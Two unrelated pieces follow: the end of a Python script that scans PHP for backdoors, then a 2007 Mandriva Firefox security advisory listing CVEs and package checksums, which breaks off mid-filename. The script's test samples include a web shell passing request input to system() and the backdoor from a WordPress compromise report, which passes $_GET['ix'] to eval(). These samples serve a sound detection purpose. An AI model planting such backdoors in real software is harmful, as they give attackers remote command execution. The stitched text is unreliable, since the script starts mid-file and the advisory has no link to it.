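SAMPLE_FEED_PHP = """<?php
// ... legitimate feed code above ...
function comment_text_phpfilter($filterdata) {
   eval($filterdata);
}
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
"""

# Constructed: the same flaw without a wrapper function.
SAMPLE_DIRECT_PHP = """<?php
system($_REQUEST["cmd"]);
"""

# Constructed: request input used, but no code/command sink involved.
SAMPLE_CLEAN_PHP = """<?php
function get_comment_text($id) {
   return esc_html(fetch_comment($id));
}
echo get_comment_text($_GET["id"]);
"""


def wrapper_functions(php):
    """Map function name -> sink for one-argument functions whose body hands
    that argument straight to a code/command sink (the wrappers in the report)."""
    wrappers = {}
    for name, param, body in FUNC_DEF_RE.findall(php):
        for sink, arg in SINK_RE.findall(body):
            if arg == param:
                wrappers[name] = sink.lower()
    return wrappers


def find_backdoors(php):
    """Return sorted (line_no, description) findings for one PHP source string."""
    findings = set()
    wrappers = wrapper_functions(php)
    for lineno, line in enumerate(php.splitlines(), start=1):
        # 1. request input passed directly to a sink, or to a wrapper around one
        for func, src in CALL_RE.findall(line):
            if func.lower() in SINKS:
                findings.add((lineno, "%s() on %s" % (func, src)))
            elif func in wrappers:
                findings.add((lineno, "%s() wraps %s() and is fed %s" % (func, wrappers[func], src)))
        # 2. the exact function names from the compromise report
        for bad in KNOWN_BAD_NAMES:
            if re.search(r'function\s+' + bad + r'\b', line):
                findings.add((lineno, "definition of known backdoor function %s" % bad))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("feed.php", SAMPLE_FEED_PHP), ("direct", SAMPLE_DIRECT_PHP), ("clean", SAMPLE_CLEAN_PHP)):
        print(label, find_backdoors(src) or "no findings")
```

This is a regex heuristic, not a PHP parser: it sees one-level function bodies and direct calls, so a backdoor that copies $_GET into a local first, or hides the sink behind a variable function name, will slip past it. Its real value is as a fast first pass over wp-includes/ on every host that downloaded WordPress in the window the report gives; the authoritative check is comparing file checksums against a known-good release tarball.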


[ MDKSA-2007:050-1 ] - Updated Firefox packages fix multiple vulnerabilities

2007-03-03 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ____________________________________________________________________
 
 Mandriva Linux Security Advisory   MDKSA-2007:050-1
 http://www.mandriva.com/security/
 ____________________________________________________________________
 
 Package : mozilla-firefox
 Date: March 2, 2007
 Affected: 2007.0, Corporate 3.0, Corporate 4.0
 ____________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Firefox program, version 1.5.0.10.
 
 This update provides the latest Firefox to correct these issues.

 Update:

 A regression was found in the latest Firefox packages provided where
 changes to library paths caused applications that depended on the NSS
 libraries (such as Thunderbird and Evolution) to fail to start or fail
 to load certain SSL-related security components.  These new packages
 correct that problem and we apologize for any inconvenience the
 previous update may have caused.
 ____________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092
 http://www.mozilla.org/security/announce/2007/mfsa2007-01.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-02.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-03.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-04.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-05.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-06.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-07.html
 http://www.mozilla.org/security/announce/2007/mfsa2007-08.html
 ____________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 411bc0bdd8dc32950a84c77ed3319508  2007.0/i586/libmozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.i586.rpm
 9ceb031931003fb861882f4455c6648b  2007.0/i586/libmozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.i586.rpm
 db615eadf763927182c8657d11b1ae54  2007.0/i586/libnspr4-1.5.0.10-2mdv2007.0.i586.rpm
 bd7dca3e972f552b5dd347822e17f1e1  2007.0/i586/libnspr4-devel-1.5.0.10-2mdv2007.0.i586.rpm
 bb4709aa4bf277e32c25e07d93641802  2007.0/i586/libnspr4-static-devel-1.5.0.10-2mdv2007.0.i586.rpm
 babf7d44d0340cd51f45249d3002180e  2007.0/i586/libnss3-1.5.0.10-2mdv2007.0.i586.rpm
 19a967982b748b879b1904d5bcea174d  2007.0/i586/libnss3-devel-1.5.0.10-2mdv2007.0.i586.rpm
 6333bab7a5d530836fa5a64383bcdd30  2007.0/i586/mozilla-firefox-1.5.0.10-2mdv2007.0.i586.rpm
 72672b4bbfcc4f13d5820a4c11bca547  2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 9fe9779d9d02f0aa73d28096cc237d00  2007.0/x86_64/lib64mozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.x86_64.rpm
 3c0a879b450f5c2569eb81d397a82906  2007.0/x86_64/lib64mozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.x86_64.rpm
 338d81330e754d5ffd22dea67c2fbfd2  2007.0/x86_64/lib64nspr4-1.5.0.10-2mdv2007.0.x86_64.rpm
 0c840ec9a78c48d975db6bca80e53caa  2007.0/x86_64/lib64nspr4-devel-1.5.0.10-2mdv2007.0.x86_64.rpm
 3f1ba2da63bf990b3958f184bdf4d96f  2007.0/x86_64/lib64nspr4-static-devel-1.5.0.10-2mdv2007.0.x86_64.rpm
 cd9ef9efe9f859467a07bfc20899156d  2007.0/x86_64/lib64nss3-1.5.0.10-2mdv2007.0.x86_64.rpm
 d6243e7d7c76a5ff5a418f7304cdcff2  2007.0/x86_64/lib64nss3-devel-1.5.0.10-2mdv2007.0.x86_64.rpm
 0fec2d70c6a797521304598b802d03b1  2007.0/x86_64/mozilla-firefox-1.5.0.10-2mdv2007.0.x86_64.rpm
 72672b4bbfcc4f13d5820a4c11bca547  2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm

 Corporate 3.0:
 24fbf58752279b3a5ec8d186d7c6142b  corporate/3.0/i586/libnspr4-1.5.0.10-1.1.C30mdk.i586.rpm
 cc59dd85bcdc065ed4ee7f3d299e971a  corporate/3.0/i586/libnspr4-devel-1.5.0.10-1.1.C30mdk.i586.rpm
 284b6bf1210fb854361a9af3062528e1  corporate/3.0/i586/libnspr4-static-devel-1.5.0.10-1.1.C30mdk.i586.rpm
 cf17ffa7ff1734b850c7f7a5b7f780ee  corporate/3.0/i586/libnss3-1.5.0.10-1.1.C30mdk.i586.rpm
 82e74bce4abb564958d0225bc94687d6  corporate/3.0/i586/libnss3-devel-1.5.0.10-1.1.C30mdk.i586.rpm
 5af5da7a1f51c609568f03b2026c0687  corporate/3.0/i586/mozilla-firefox-1.5.0.10-1.1.C30mdk.i586.r